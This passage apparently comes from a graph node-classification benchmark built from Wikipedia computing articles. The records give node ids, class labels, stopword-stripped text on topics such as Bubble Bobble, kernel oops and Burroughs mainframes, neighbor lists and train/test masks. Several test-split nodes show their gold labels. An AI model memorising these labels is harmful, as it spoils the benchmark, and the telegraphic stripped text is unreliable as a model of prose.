      6834,
      2485,
      8630,
      4797,
      8640,
      3777,
      7873,
      2884,
      3781,
      2887,
      7248,
      11221,
      5085,
      2661,
      10341,
      615,
      9193,
      6000,
      4725,
      5749,
      7541,
      8054,
      5887
    ],
    "mask": "Test"
  },
  {
    "node_id": 1693,
    "label": 3,
    "text": "Bubble_Bobble:bubble bobble creator bubble bobble fukio mitsuji mtj went create games syvalion volfied died december 11 2008 game plot baron von blubba kidnapped brothers bubby bobby girlfriends turned brothers bubble dragons bub bob bub bob finish 100 levels cave monsters order rescue game player controls one two dragons players move along platforms fall lower ones jump higher ones gaps level limited single screen scrolling however screen gaps bottom edge players fall reappear top level certain number enemies must defeated order advance players must blow bubbles trap enemies burst bubbles colliding enemy defeated manner turns food item picked extra points defeating multiple enemies awards higher scores causes valuable food items appear bubbles float certain length time bursting players jump ride otherwise inaccessible areas magic items appear time time grant special abilities advantages picked special bubbles occasionally appear burst attack enemies fire water lightning furthermore player collects letter bubbles form extend bonus life earned players immediately advance next level player loses one life upon touching free enemies projectiles rocks fireballs lasers bottles enemies turn angry —turning pink color moving faster—if escape bubble left long players spend certain amount time current level return normal either player loses life time limit expires additional invincible enemy appears player actively chasing using vertical horizontal movements disappear level cleared player loses life one enemy left immediately becomes angry remains state defeated 100th final level players face boss one first games feature multiple endings completing level 100 single-player mode reveals message stating game truly ended hint player come friend two players complete game see happy end brothers transformed human selves reunited girlfriends ending also includes code deciphered allows game played faster difficult super mode mode completed two players second happy end displayed super drunk defeated boss revealed brothers parents control outside influence brothers return normal reunited parents girlfriends ports bubble bobble released commodore 64 zx spectrum amiga atari st msx2 amstrad cpc x68000 ms-dos apple ii fm towns marty master system game boy game boy color playstation saturn nes famicom disk system game gear mobile phone sprint pcs original 8- 16-bit versions msx2 nes/famicom disk system game boy master system versions made taito though master system version published sega game gear port emulates master system version bubble bobble done south korean developer open corporation commodore 64 spectrum amiga versions developed software creations published uk firebird software computer ports made us-based novalogic exception x68000 game japan done dempa shinbunsha game boy color version co-created video game developers dreams i.t.l commodore 64 coder steve ruddy recalled retro gamer master system/game gear version two hundred levels effect normal super modes consecutively considered one best conversions available version originally released final bubble bobble 1988 master system japan arrived europe three years later title shortened bubble bobble game never released master system north america game gear instead platform region particular version bubble bobble msx2 port like master system/game gear version features one hundred levels normal mode another set hundred super mode unlike master system/game gear version super mode msx2 game alternative normal mode rather succeeding accessed entering special code similar konami code 1 2 player select screen x68000 version bubble bobble includes secret sybubblun mode contains 20 difficult levels characters changed syvalion another game designed fukio mitsuji 1996 taito announced original source code lost probe entertainment charge home conversions taito sent bubble bobble arcade pcb could play original game reproduce mechanics led release bubble bobble also featuring saturn playstation pc 1996 published acclaim entertainment game boy game boy color versions since game boy nature single player device storyline involves bub looking moon water cure brother known bubble bobble classic bubble bobble respectively mean machines gave game boy port game score 91 noting changes made game played identical original arcade port provides much addiction challenge four reviewers electronic gaming monthly stated game gear version faithful conversion original works well portable form particularly praised simplicity gameplay concept graphics two-player link option spectrum version voted number 58 sinclair readers top 100 games time gamesradar ranked 24th best nes game ever made staff praised advancements platform games time use multiple endings october 2005 version released xbox playstation 2 microsoft windows part taito legends compilation end 2006 new port mobile phones europe japan released december 24 2007 nes version bubble bobble released north america nintendo virtual console service wii famicom version bubble bobble also released nintendo eshop october 16 2013 nintendo 3ds january 29 2014 wii u november 11 2016 game included nes classic edition arcade version bubble bobble widely bootlegged due security chip installed taito known ps4 based motorola 6800 none bootlegs play exactly like original decapping mame team reverse engineered workings chip emulate following project bubble bobble redux able implement exact version bubble bobble bootleg boards version exists bbc micro public domain though never officially released according one creators coded independently 1988 clone c64 version approached publishers deemed would financially viable release licensed product bbc micro time double bobble 2000 public domain shareware made port bubble bobble atari falcon030 gameplay converted arcade machine released 1995 atari demo/game group reservoir gods mobygames one last commercial offerings near dead system time game reviewed december 1995 issue uk magazine st format dec 1995 scans receiving rating 96 2002 fan-made clone texas instruments ti-8x series calculators released bubble bobble lost cave fan project added new levels runs original arcade hardware bubble bobble characters made cameo appearances manga gamest nª49 gasmest island mokushiroku october 1992 created shinseisha bub bubble bobble chack chack n'pop appeared manga may 2009 bubblun makes cameo manga high score girl",
    "neighbors": [
      8709,
      4043,
      8300,
      8492,
      9166,
      5263,
      10316,
      4690,
      10931,
      6390,
      5882,
      5275,
      9501,
      4894
    ],
    "mask": "None"
  },
  {
    "node_id": 1694,
    "label": 3,
    "text": "Linux_kernel_oops:linux kernel oops computing oops deviation correct behavior linux kernel one produces certain error log better-known kernel panic condition results many kinds oops instances oops event may allow continued operation compromised reliability term stand anything simple mistake kernel detects problem kills offending processes prints oops message linux kernel engineers use debugging condition created oops fixing underlying programming error system experienced oops internal resources may longer operational thus even system appears work correctly undesirable side effects may resulted active task killed kernel oops often leads kernel panic system attempts use resources lost official linux kernel documentation regarding oops messages resides file kernel sources logger configurations may affect ability collect oops messages codice_1 software collect submit kernel oopses repository www.kerneloops.org website provides statistics public access reported oopses person familiar technical details computers operating systems oops message might look confusing unlike operating systems windows macos linux chooses present details explaining crash kernel rather display simplified user-friendly message bsod windows simplified crash screen proposed times however currently none development",
    "neighbors": [
      2560,
      4616,
      3082,
      2571,
      5644,
      5139,
      9237,
      10780,
      4637,
      10785,
      3618,
      6180,
      9257,
      1584,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      2134,
      3162,
      10333,
      2658,
      6244,
      5222,
      10856,
      6763,
      4207,
      5744,
      7795,
      5244,
      4734,
      11391,
      7812,
      8326,
      6797,
      4238,
      7821,
      10382,
      657,
      2195,
      8852,
      2711,
      6808,
      9882,
      6301,
      2723,
      8364,
      6319,
      11444,
      10933,
      5815,
      5822,
      9919,
      5824,
      4803,
      1736,
      2762,
      8909,
      6352,
      3289,
      3802,
      8410,
      10971,
      4831,
      8928,
      1761,
      10464,
      2278,
      233,
      4841,
      7403,
      7920,
      8944,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      11533,
      4367,
      1813,
      792,
      10016,
      5410,
      295,
      1833,
      815,
      7983,
      5430,
      823,
      6968,
      7992,
      318,
      3395,
      3911,
      4423,
      6988,
      10063,
      4437,
      5975,
      11095,
      3422,
      863,
      2914,
      10091,
      6508,
      7020,
      1394,
      1396,
      7540,
      1399,
      8573,
      1406,
      3458,
      7555,
      900,
      8066,
      11654,
      5514,
      4493,
      10127,
      5520,
      3474,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      10687,
      9667,
      4040,
      457,
      5067,
      8147,
      9696,
      2529,
      1506,
      6625,
      8676,
      2021,
      9190,
      11232,
      1513,
      10732,
      3055,
      5105,
      1524,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 1695,
    "label": 5,
    "text": "Wireless_Village:wireless village wireless village set specifications mobile instant messaging presence services intended standard cellphones mobile devices use services across platforms many wireless phones include mobile instant messaging capabilities designed hook messaging services using imps carrier network formerly known wireless village protocol phones implement im icon phone typically renamed customized cellphone carrier removed completely supported network level nokia motorola phones feature many sony ericsson phones white paper describes service possible protocol makes use existing internet web technologies technologies implemented widely well tested use within protocol ensure easy implementation interoperability testing xml extensible markup language rapidly emerging lingua franca representing structured data web extent possible protocol uses xml represent protocol data exchanged imps session imps activities ietf impp received widespread interest throughout industry although still development extent possible wireless village initiative support cpim draft build upon useful standards space include multipurpose internet mail extensions mime registering format imps protocol messages announcement made service conceived ericsson motorola nokia specification maintained open mobile alliance currently version 1.3 protocol public services exist using wireless village unlocked phone configured use services therefore connect instant messaging services implemented yamigo free communications service based finland allowed instant messaging mobile phones wireless data services gprs service based protocol wireless village developed open mobile alliance joint venture nokia sony ericsson motorola mobile device manufacturers certain models mobile phones include chat client could access yamigo network included certain models phones nokia motorola sony ericsson siemens registered yamigo users could send messages users yahoo messenger msn messenger aol instant messenger icq yamigo supported importing contact lists services automatically users connected yamigo via wap internet service sign page users selected frequently phone polled yamigo network client-server protocol receiving messages depended often phone set poll network service abandoned late 2005 last upgrade version .19 april 2005",
    "neighbors": [
      4609,
      7396,
      1285,
      11240,
      5875,
      9207
    ],
    "mask": "None"
  },
  {
    "node_id": 1696,
    "label": 5,
    "text": "Compiled_Wireless_Markup_Language:compiled wireless markup language networking mobile devices wmlc format efficient transmission wml web pages wireless application protocol wap primary purpose compress rather tokenise wml page transport low-bandwidth internet connections gprs/2g wmlc apparently synonymous wireless application protocol binary xml wbxml wmlc efficient pages contain frequently repeated strings characters commonly used phrases www nowiki http //www. /nowiki tokenised replaced single byte transmission re-inserted destination wmlc added advantage data progressively decoded unlike compression algorithms require data available decompression begins soon first bytes wmlc data available wap browser start creating page means user see page constructed downloaded content type application/vnd.wap.wmlc",
    "neighbors": [
      11240,
      5875
    ],
    "mask": "None"
  },
  {
    "node_id": 1697,
    "label": 1,
    "text": "Deductive_database:deductive database deductive database database system make deductions i.e. conclude additional facts based rules facts stored deductive database datalog language typically used specify facts rules queries deductive databases deductive databases grown desire combine logic programming relational databases construct systems support powerful formalism still fast able deal large datasets deductive databases expressive relational databases less expressive logic programming systems recent years deductive databases datalog found new application data integration information extraction networking program analysis security cloud computing deductive databases logic programming deductive databases reuse large number concepts logic programming rules facts specified deductive database language datalog look similar prolog however important differences deductive databases logic programming",
    "neighbors": [
      2688,
      5632,
      8201,
      4376,
      10137,
      9631,
      9397,
      4155,
      7868,
      9147,
      11324,
      2369,
      11457,
      6085,
      9286,
      2512,
      2901,
      7767,
      11098,
      987,
      7650,
      8291,
      9828,
      8421,
      10471,
      5880,
      1146,
      6395,
      3196
    ],
    "mask": "None"
  },
  {
    "node_id": 1698,
    "label": 9,
    "text": "JavaScript_framework:javascript framework javascript framework application framework written javascript differs javascript library control flow library offers functions called parent code whereas framework defines entire application design developer call framework instead framework call use code particular way javascript frameworks follow model–view–controller paradigm designed segregate web application orthogonal units improve code quality maintainability examples angularjs ember.js meteor.js",
    "neighbors": [
      8068,
      3462,
      6791,
      1802,
      6154,
      8605,
      6176,
      803,
      5031,
      1203,
      438,
      7871,
      5311,
      8262,
      5067,
      339,
      4056,
      9560,
      9561,
      8923,
      8289,
      9195,
      5101,
      10991,
      10739,
      10744
    ],
    "mask": "Test"
  },
  {
    "node_id": 1699,
    "label": 2,
    "text": "Printer_Setup_Utility:printer setup utility printer setup utility application mac os x served allow user configure printers physically connected computer connected via network utility provided specific tools user friendly printers pane system preferences mac os x 10.5 leopard printer setup utility removed features placed print fax system preferences pane viewing individual printers queues moved printer proxy application",
    "neighbors": [
      11521,
      2819,
      1796,
      3719,
      4615,
      10888,
      11402,
      9100,
      5647,
      10512,
      1042,
      8852,
      9109,
      7318,
      4888,
      3228,
      11037,
      2207,
      1439,
      811,
      3371,
      5292,
      1710,
      6700,
      7983,
      8877,
      1074,
      10036,
      3766,
      2232,
      9912,
      11257,
      9406,
      6849,
      4933,
      713,
      7626,
      9035,
      9418,
      3790,
      7118,
      5713,
      3670,
      9430,
      4184,
      3035,
      4571,
      2141,
      4702,
      4068,
      2149,
      5093,
      487,
      231,
      4457,
      9451,
      10221,
      8303,
      2288,
      6771,
      2676,
      7928,
      8441,
      7163,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 1700,
    "label": 2,
    "text": "LinHES:linhes linhes linux home entertainment server linux distribution designed use home theater pcs htpcs version 6 called knoppmyth recent release r8 64-bit machines based arch linux though previous versions based knoppix debian linhes includes custom scripts install configure mythtv pvr software well number add-ons standard htpc hardware supported much even configured automatically making often complex installation configuration process relatively easy pain-free cecil watson developed maintains linhes operating system linhes linux distribution equivalent windows media center linhes comes cd-rom software distribution automates setup popular mythtv package well several htpc-related add-ons ultimately linhes used create home theater pc htpcs commonly plugged standard-definition television sdtv high-definition television hdtv rather monitors complete home theater experience htpcs bring power pcs living room one device common complaint mythtv difficult time-consuming install configure goal linhes make creating maintaining home theater pc simple possible blank system transformed fully functional htpc around 20 minutes 20 minutes system capable linhes used install full mythtv client server system means front-end stored device back-end front-end software required visual elements gui regular user utilize find play manipulate media files etc back-end server media files actually stored full front-end back-end system may advantage 'portability i.e standalone device dependent separate server like video game console example alternatively linhes used install mythtv client front-end-only system example users may central storage device server house server accessed numerous devices throughout house devices needing front-end installation devices containing minimal hardware linhes also run directly cd-rom i.e without installation providing network connection pc 'complete installation mythtv back-end server using 'server separate one front-end units obvious advantages multiple simultaneous access shared media files server used would generally hardware relatively high specification would kept outside main living room advantage keeping server pc outside living room cooling fan required accommodate 'fast processor quite noisy certain hard drives expensive invest fanless/heat sinking equipment avoid noise problems linhes also used upgrade existing linhes knoppmyth installations linhes users generally discuss ideas help others official forum website linhes r7.4 last 32-bit release",
    "neighbors": [
      8837,
      7435,
      6797,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      6058,
      7854,
      2738,
      4147,
      7602,
      4790,
      823,
      439,
      56,
      59,
      8124,
      3903,
      4673,
      2375,
      4039,
      5067,
      8907,
      3664,
      1107,
      1110,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      5612,
      6380,
      7020,
      2671,
      7534,
      7920,
      8177,
      9074,
      10860,
      9461,
      6393,
      4219,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 1701,
    "label": 1,
    "text": "Quorum_(distributed_computing):quorum distributed computing quorum minimum number votes distributed transaction obtain order allowed perform operation distributed system quorum-based technique implemented enforce consistent operation distributed system quorum-based voting used replica control method well commit method ensure transaction atomicity presence network partitioning distributed database system transaction could executing operations multiple sites since atomicity requires every distributed transaction atomic transaction must fate commit abort every site case network partitioning sites partitioned partitions may able communicate quorum-based technique comes fundamental idea transaction executed majority sites vote execute every site system assigned vote v. let us assume total number votes system v abort commit quorums v v respectively following rules must obeyed implementation commit protocol first rule ensures transaction committed aborted time next two rules indicate votes transaction obtain terminate one way replicated databases data object copies present several sites ensure serializability two transactions allowed read write data item concurrently case replicated databases quorum-based replica control protocol used ensure two copies data item read written two transactions concurrently quorum-based voting replica control due gifford 1979 copy replicated data item assigned vote operation obtain read quorum v write quorum v read write data item respectively given data item total v votes quorums obey following rules first rule ensures data item read written two transactions concurrently additionally ensures read quorum contains least one site newest version data item second rule ensures two write operations two transactions occur concurrently data item two rules ensure one-copy serializability maintained",
    "neighbors": [
      10917,
      3398,
      3927,
      5047,
      1049,
      9243
    ],
    "mask": "None"
  },
  {
    "node_id": 1702,
    "label": 3,
    "text": "Burroughs_large_systems:burroughs large systems 1970s burroughs corporation organized three divisions different product line architectures high-end mid-range entry-level business computer systems division product line grew different concept optimize computer instruction set particular programming languages burroughs large systems group designed large mainframes using stack machine instruction sets dense syllables 48-bit data words first design b5000 1961 optimized running algol 60 extremely well using simple compilers evolved b5500 subsequent major redesigns include b6500/b6700 line successors separate b8500 line 'burroughs large systems referred product lines together contrast cobol-optimized medium systems b2000 b3000 b4000 flexible-architecture small systems b1000 founded 1880s burroughs oldest continuously operating entity computing late 1950s computing equipment still limited electromechanical accounting machines sensimatic nothing compete traditional rivals ibm ncr started produce larger-scale computers recently founded univac 1956 branded b205 machine produced company bought first internally developed machine b5000 designed 1961 burroughs sought address late entry market strategy completely different design based advanced computing ideas available time b5000 architecture dead inspired b6500 subsequent b6700 b7700 computers using architecture still production unisys clearpath libra servers run evolved compatible version mcp operating system first introduced b6700 third largest line b8500 commercial success addition proprietary cmos processor design unisys also uses intel xeon processors runs mcp microsoft windows linux operating systems libra servers use custom chips gradually eliminated 2018 libra servers strictly commodity intel years first member first series b5000 designed beginning 1961 team leadership robert bob barton unique machine well ahead time listed influential computing scientist john mashey one architectures admires always thought one innovative examples combined hardware/software design 've seen far ahead time b5000 succeeded b5500 used disks rather drum storage b5700 allowed multiple cpus clustered around shared disk successor b5700 b5000 line heavily influenced design b6500 burroughs ported master control program mcp machine b5000 revolutionary time architecture instruction set designed needs software taken consideration large departure computer system design time processor instruction set would designed handed software people still instruction sets ibm system/360 instruction set era later instruction set designs x86 ppc arm instruction set architectures essentially traditional instruction set based architectures rather holistic designs like original burroughs systems b5000 b5500 b5700 word mode two different addressing modes depending whether executing main program salf subroutine salf main program field operand call descriptor call syllable relative program reference table prt subroutines type addressing dependent high three bits mark stack flipflop msff shown b5x00 relative addressing b5000 designed exclusively support high-level languages time languages coming prominence fortran cobol fortran cobol considered weaker languages comes modern software techniques newer mostly untried language adopted algol-60 algol dialect chosen b5000 elliott algol first designed implemented c.a.r hoare elliott 503 practical extension algol io instructions algol ignored powerful string processing instructions hoare famous turing award lecture subject thus b5000 based powerful language vendors could dream implementing algol compiler industry dismissed algol unimplementable however bright young student named donald knuth previously implemented algol 58 earlier burroughs machine three months summer break peripherally involved b5000 design consultant many wrote algol mistakenly believing high-level languages could power assembler thus realizing algol potential systems programming language burroughs algol compiler fast — impressed dutch scientist edsger dijkstra submitted program compiled b5000 pasadena plant deck cards compiled almost immediately immediately wanted several machines university eindhoven university technology netherlands compiler fast several reasons primary reason one-pass compiler early computers enough memory store source code compilers even assemblers usually needed read source code burroughs algol syntax unlike official language requires variable object declared used feasible write algol compiler reads data concept profound theoretical implications also permits fast compiling burroughs large systems could compile fast could read source code punched cards fastest card readers industry powerful burroughs cobol compiler also one-pass compiler equally fast 4000-card cobol program compiled fast 1000-card/minute readers could read code program ready use soon cards went reader b6500 delivery 1969 b7500 first computers line burroughs systems survive present day inspired b5000 totally new architecture among important differences b8500 line derives d825 military computer inspired b5000 b8500 designed 1960s attempt merge b5500 d825 designs system used monolithic integrated circuits magnetic thin-film memory architecture employed 48-bit word stack descriptors like b5500 advertised upward-compatible b8500 could never gotten work reliably project canceled 1970 never delivered completed system first burroughs large systems b5000 designed 1961 second-generation computer using discrete transistor logic magnetic core memory first machines replace b5000 architecture b6500 b7500 successor machines followed hardware development trends re-implement architectures new logic next 25 years b5500 b6500 b5700 b6700 b7700 b6800 b7800 finally burroughs series merger burroughs acquired sperry corporation changed name unisys company continued develop new machines based mcp cmos asic machines libra 100 libra 500 libra 590 announced 2005 later libras including 590 also incorporate intel xeon processors run burroughs large systems architecture emulation well mcp cmos processors unclear unisys continue development new mcp cmos asics hardware software design development manufacturing split two primary locations orange county california outskirts philadelphia initial large systems plant developed b5000 b5500 located pasadena california moved city industry california developed b6500 orange county location based plant mission viejo california times included facilities nearby irvine lake forest responsible smaller b6x00 line east coast operations based tredyffrin pennsylvania handled larger b7x00 line machines lines fully object-compatible meaning program compiled one could executed another newer larger models instructions supported older slower models hardware encountering unrecognized instruction invoked operating system function interpreted differences include process switching i/o handled maintenance cold-starting functionality larger systems included hardware process scheduling capable input/output modules highly functional maintenance processors bxx00 models replaced series models differences retained longer readily identifiable model number burroughs large systems implement algol-derived stack architecture unlike linear architectures pdp-11 motorola m68k itanium segmented architectures x86 texas instruments refers layout memory program uses b5000 specifically designed support algol starting point business-oriented languages cobol also well supported notably powerful string operators included development fast compilers algol used b5000 extended algol subset includes powerful string manipulation instructions excludes certain algol constructs notably unspecified formal parameters define mechanism serves similar purpose defines found c fully integrated language rather preprocessor event data type facilitates coordination processes fault blocks enable handling program faults user level algol include many insecure constructs needed operating system system software two levels language extensions provide additional constructs espol newp writing mcp closely related software dcalgol dmalgol provide specific extensions specific kinds system software originally b5000 mcp operating system written extension extended algol called espol executive systems programming oriented language replaced mid-to-late 70s language called newp though newp probably meant new programming language legends surround name common perhaps apocryphal story within burroughs time suggested came “ executive washroom privileges ” another story circa 1976 john mcclintock burroughs software engineer developing newp named language newp asked yet name yet answering nyoooop adopted name newp subset algol extension secure espol dropped little-used complexities algol fact unsafe constructs rejected newp compiler unless block specifically marked allow instructions marking blocks provide multi-level protection mechanism newp programs contain unsafe constructs initially non-executable security administrator system able bless programs make executable normal users able even privileged users normally essentially root privilege may unable depending configuration chosen site newp used write general programs number features designed large software projects support everything algol newp number facilities enable large-scale software projects operating system including named interfaces functions data groups interfaces modules super-modules modules group data functions together allowing easy access data global within module interfaces allow module import export functions data super-modules allow modules grouped second intermediate level security operating system code newp user programs algol middleware programs written dcalgol data comms algol used message reception dispatching remove messages input queues places queues processes system handle middleware coms introduced around 1984 receive messages around network dispatch messages specific handling processes mcs message control system cande command edit program development environment mcss items software worth noting – control user sessions provide keeping track user state without run per-user processes since single mcs stack shared many users load balancing also achieved mcs level example saying want handle 30 users per stack case 31 60 users two stacks 61 90 users three stacks etc gives b5000 machines great performance advantage server since n't need start another user process thus create new stack time user attaches system thus efficiently service users whether require state mcss mcss also provide backbone large-scale transaction processing mcs talked external co-processor dcp datacomm control processor 24-bit minicomputer conventional register architecture hardware i/o capability handle thousands remote terminals dcp b6500 communicated messages memory essentially packets today terms mcs b6500-side processing messages early years dcp assembler dacoma application program called dcpprogen written b6500 algol later ndl network definition language compiler generated dcp code ndf network definition file one algol function kind dcp instruction called function corresponding dcp instruction bits would emitted output dcp program algol program comprising nothing long list calls functions one assembly language statement essentially algol acted like macro pass macro assembler first pass algol compiler second pass running resulting program b6500 would emit binary dcp another variant algol dmalgol data management algol dmalgol algol extended compiling dmsii database software database description files created dasdl data access structure definition language compiler database designers administrators compile database descriptions generate dmalgol code tailored tables indexes specified administrators never need write dmalgol normal user-level programs obtain database access using code written application languages mainly algol cobol extended database instructions transaction processing directives notable feature dmalgol preprocessing mechanisms generate code handling tables indices dmalgol preprocessing includes variables loops generate names based compile-time variables enables tailoring far beyond done preprocessing facilities lack loops dmalgol used provide tailored access routines dmsii databases database defined using data access structure definition language dasdl schema translated preprocessor tailored dmalgol access routines compiled means unlike dbms implementations often need database-specific if/then/else code run-time 1970s tailoring used extensively reduce code footprint execution time became much less used later years partly low-level fine tuning memory speed became less critical partly eliminating preprocessing made coding simpler thus enabled important optimizations dmalgol included verbs like find lock store also verbs begintransaction endtransaction included solving deadlock situation multiple processes accessed updated structures roy guck burroughs one main developers dmsii later years compiler code size less concern preprocessing constructs made available user level algol unsafe constructs direct processing database description file remain restricted dmalgol many early systems languages programmers often told make routines small procedure calls returns expensive number operations performed maintain stack b5000 designed stack machine – program data except arrays include strings objects kept stack meant stack operations optimized efficiency stack-oriented machine programmer addressable registers multitasking also efficient b5000 machines one specific instruction perform process switches – mvst move stack stack represents process task thread tasks become blocked waiting resource requests includes waiting processor run task interrupted preemptive multitasking user programs issue mvst one line code operating system done process switch proceeds something like – process requests resource immediately available maybe read record file block currently memory system timer triggered interrupt operating system code entered run top user stack turns user process timers current process placed appropriate queue resource requested ready queue waiting processor preemptive context switch operating system determines first process ready queue invokes instruction move_stack makes process head ready queue active detractors b5000 architecture believed stack architecture inherently slow compared register-based architectures trick system speed keep data close processor possible b5000 stack done assigning top two positions stack two registers b operations performed two top stack positions faster machines past b5000 stack may kept registers cache near processor thus designers current successors b5000 systems optimize whatever latest technique programmers adjust code run faster – even need recompile thus protecting software investment programs known run years many processor upgrades speed limited register-based machines another point speed promoted risc designers processor speed considerably faster everything single chip valid point 1970s complex architectures b5000 required many transistors fit single chip however case today every b5000 successor machine fits single chip well performance support techniques caches instruction pipelines fact series line b5000 successors included first single chip mainframe micro-a late 1980s mainframe chip named scamp single-chip a-series mainframe processor sat intel-based plug-in pc board example programs map stack structure stack frame corresponds lexical level current execution environment see lexical level static textual nesting program dynamic call nesting visibility rules algol language designed single pass compilers mean variables declared current position visible part code thus requirement forward declarations variables declared enclosing blocks visible another case variables name may declared inner blocks effectively hide outer variables become inaccessible lexical nesting static unrelated execution nesting recursion etc rare find procedure nested five levels deep could argued programs would poorly structured b5000 machines allow nesting 32 levels could cause difficulty systems generated algol source output tailored solve special problem generation method frequently nested procedure within procedure procedures invoked four ways – normal call process run normal invocation invokes procedure normal way language invokes routine suspending calling routine invoked procedure returns call mechanism invokes procedure coroutine coroutines partner tasks control explicitly passed tasks means continue instruction synchronous processes process mechanism invokes procedure asynchronous task case separate stack set starting lexical level processed procedure asynchronous task control exactly control passed tasks unlike coroutines note also processed procedure still access enclosing environment efficient ipc inter process communication mechanism since two tasks access common variables tasks must synchronized prevent race conditions handled event data type processes wait event caused another cooperating process events also allow mutual exclusion synchronization procure liberate functions reason child task dies calling task continue – however parent process dies child processes automatically terminated machine one processor processes may run simultaneously event mechanism basic enabler multiprocessing addition multitasking last invocation type run runs procedure independent task continue originating process terminates reason child process access variables parent environment parameters passed invoked procedure must call-by-value thus burroughs extended algol multi-processing synchronization features later languages like ada made use support asynchronous processes built hardware one last possibility procedure may declared inline compiler sees reference code procedure generated inline save overhead procedure call best done small pieces code inline functions similar parameterized macros c defines except n't get problems parameters macros facility available newp example program normal calls used information single stack asynchronous calls stack would split multiple stacks processes share data run asynchronously stack hardware optimization provision display registers registers point start called stack frame registers updated automatically procedures entered exited accessible software 32 registers limits 32 levels lexical nesting consider would access lexical level 2 2 global variable lexical level 5 5 suppose variable 6 words away base lexical level 2 thus represented address couple 2 6 n't registers look control word base 5 frame points frame containing 4 environment look control word base environment find 3 environment continue fashion followed links back required lexical level note path return path back procedures called order get point architecture keeps data stack call stack structure uses control words tell apart see quite inefficient access variable registers 2 register points base lexical level 2 environment need generate address variable add offset stack frame base frame base address register efficient linked list search operator lllu could search stack fashion register approach still going faster registers access entities outer global environments efficient local variable access invoked procedure p coroutine process instruction 3 environment would become separate 3 -based stack note means asynchronous processes still access 2 environment implied algol program code taking one step totally different program could call another program ’ code creating 3 stack frame pointing another process ’ 2 environment top process stack instant whole address space code ’ execution environment changes making 2 environment process stack directly addressable instead make 2 environment another process stack directly addressable library calls implemented cross-stack call calling code called code could even originate programs written different source languages compiled different compilers note 1 0 environments occur current process stack 1 environment code segment dictionary shared processes running code 0 environment represents entities exported operating system stack frames actually ’ even exist process stack feature used early file io optimization fib file information block linked display registers 1 io operations early nineties ability implemented language feature structure blocks – combined library technology connection blocks ability link data structure display register address scope implemented object orientation thus b5000 actually used form object orientation long term ever used systems compiler might build symbol table similar manner eventually storage requirements would collated machine code would written use flat memory addresses 16-bits 32-bits even 64-bits addresses might contain anything write wrong address could damage anything instead two-part address scheme implemented hardware lexical level variables placed displacements base level stack typically occupying one word double precision complex variables would occupy two arrays stored area one word descriptor array thus lexical level total storage requirement great dozens hundreds thousand extreme cases certainly count requiring 32-bits indeed reflected form valc instruction value call loaded operand onto stack op-code two bits long rest byte bits concatenated following byte give fourteen-bit addressing field code executed would lexical level say six meant lexical levels zero six valid three bits needed specify lexical level desired address part valc operation thus reserved three bits purpose remainder available referring entities lower levels deeply nested procedure thus high lexical level would fewer bits available identify entities level sixteen upwards number restricted deepest nesting five bits would needed specify choice levels 0–31 thus leaving nine bits identify 512 entities severe constraint much compact addressing entities literal memory address 32-bit addressing space valc opcode loaded data opcodes add mult forth addressing working entirely top elements stack much important method meant many errors available systems employing flat addressing could occur simply unspeakable even machine code level task way corrupt memory use another task way develop address similarly within task array descriptor contained information array bounds indexing operation checked hardware put another way array formed address space case tagging memory words provided second level protection misdirected assignment value could go data-holding location one holding pointer array descriptor etc certainly location holding machine code arrays stored contiguous memory variables granted address space located via descriptor access mechanism calculate stack index variable therefore full integer range potential fourteen bits use offset array address space bound checking provided hardware array length exceed 1,024 words array would segmented index converted segment index offset indexed segment algol case multidimensional array would employ multiple levels addressing reference j first index would array descriptors one descriptor rows row would indexed j single-dimensional array higher dimensions hardware checking known bounds array indices would prevent erroneous indexing fortran however regards multidimensional arrays equivalent single-dimensional array size multidimensional array simple integer arithmetic used calculate offset element j k would found single sequence single-dimensional equivalent array possibly segmented large enough would accessed manner single-dimensional array algol although accessing outside array would prevented wrong value one index combined suitably wrong value another index might result bounds violation single sequence array words indices checked individually array storage bounded side storage items easy system resize array though changing number dimensions precluded compilers required references number dimensions algol case enabled development ragged arrays rather usual fixed rectangular higher dimension arrays thus two dimensions ragged array would rows different sizes instance given large array 100,100 mostly-zero values sparse array representation declared sa 100,0 could row resized exactly enough elements hold non-zero values along row arrays larger 1024 words segmented smaller arrays system short real memory increasing declared size collection scratchpad arrays 1,000 say 1,050 could mean program would run far less thrashing smaller individual segments use needed memory actual storage array segment would allocated run time element segment accessed elements created segment would initialised zero initialising array zero start therefore encouraged normally unwise omission one nice thing stack structure program happen fail stack dump taken easy programmer find exactly state running program compare core dumps exchange packages systems another thing stack structure programs implicitly recursive fortran expected support recursion perhaps one stumbling block people understanding algol implemented implement recursion b5000 problem – fact reverse problem stop programs recursive end n't bother burroughs fortran compiler allowed recursive calls every fortran compiler unlike many computers stack-based system returns calls succeeded well could odd effects system formal manipulation mathematical expressions whose central subroutines repeatedly invoked without ever returning large jobs ended stack overflow thus burroughs fortran better error checking contemporary implementation fortran instance subroutines functions checked invoked correct number parameters normal algol-style compilers computers mismatches common causes crashes similarly array-bound checking programs used years systems embarrassingly often would fail run burroughs system fact burroughs became known superior compilers implementation languages including object-oriented simula superset algol iverson designer apl declared burroughs implementation apl best 'd seen john mccarthy language designer lisp disagreed since lisp based modifiable code like unmodifiable code b5000 lisp implementations would run interpretive environment anyway note also storage required multiple processes came system memory pool needed need sysgens burroughs systems competing systems order preconfigure memory partitions run tasks defining aspect b5000 stack machine treated however two important features architecture tag-based descriptor-based original b5000 flag bit control numeric word set aside identify word control word numeric word partially security mechanism stop programs able corrupt control words stack later b6500 designed realized 1-bit control word/numeric distinction powerful idea extended three bits outside 48 bit word tag data bits bits 0–47 tag bits 48–50 bit 48 read-only bit thus odd tags indicated control words could written user-level program code words given tag 3 list tags function note internally machines 60 bit words extra bits used engineering purposes hamming code error-correction field never seen programmers note current incarnation machines unisys clearpath extended tags four bit tag microcode level specified four bit tags referred level gamma even-tagged words user data modified user program user state odd-tagged words created used directly hardware represent program execution state since words created consumed specific instructions hardware exact format words change hardware implementation user programs need recompiled since code stream produce results even though system word format may changed 